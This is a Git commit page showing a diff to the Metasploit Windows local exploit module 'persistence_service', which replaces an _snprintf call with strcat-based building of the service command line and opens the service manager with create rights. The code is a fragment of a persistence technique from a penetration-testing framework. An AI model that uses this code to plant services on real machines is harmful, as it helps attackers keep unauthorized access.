adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Work around snprintf

Browse Source
This commit is contained in:
Jacob Robles
2018-12-13 14:29:54 -06:00
parent 92feeea0ca
commit 58aa16d06b
1 changed files with 16 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/windows/local/persistence_service.rb
+16 -3
View File
@@ -357,14 +357,27 @@ class MetasploitModule < Msf::Exploit::Local
// Build the service command line
char cmd[MAX_PATH];
int len = _snprintf(cmd, sizeof(cmd), "\\"%s\\" #{@start_cmd}", path);
//char cmd[MAX_PATH];
//int len = _snprintf(cmd, sizeof(cmd), "\\"%s\\" #{@start_cmd}", path);
if (len < 0 || len == sizeof(cmd)) {
//if (len < 0 || len == sizeof(cmd)) {
// //printf("Cannot build service command line (0x%08x)", -1);
// return FALSE;
//}
char cmd[MAX_PATH];
int total_len = strlen(path) + #{3 + @start_cmd.length};
if (total_len < 0 || total_len >= sizeof(cmd)){
//printf("Cannot build service command line (0x%08x)", -1);
return FALSE;
}
cmd[0] = '\\0';
strcat(cmd, "\\"");
strcat(cmd, path);
strcat(cmd, "\\" #{@start_cmd}");
// Open the service manager
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);